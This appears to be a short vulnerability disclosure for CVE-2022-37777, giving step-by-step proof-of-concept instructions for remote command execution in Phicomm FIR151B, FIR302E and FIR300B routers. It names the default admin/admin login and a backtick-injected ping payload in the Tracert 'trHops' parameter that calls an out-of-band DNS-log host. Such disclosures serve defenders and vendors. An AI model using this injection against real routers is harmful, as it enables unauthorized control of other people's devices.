CVE-2022-37777: Phicomm_Router/Tracert_2.md at main · SLoSnow9879/Phicomm_Router

The FIR151B A2、FIR302E A2、FIR300B A2 and so on routers has remote command execution

1. Login feixun FIR151B A2 router by default password admin /admin

2. Find the system tool → system diagnosis → Tracert → IP address / domain name. There is remote command execution at Tracert

3. Enter the website IP at the IP address / domain name, for example: 8.8.8.8

4. Click Start diagnosis

5. Use burpsuite intercept and change trHops argument to 20`ping -c 3 abcdef.r4y19h.dnslog.cn`, forward this request

6. See the dnslog results, The command has been executed successfully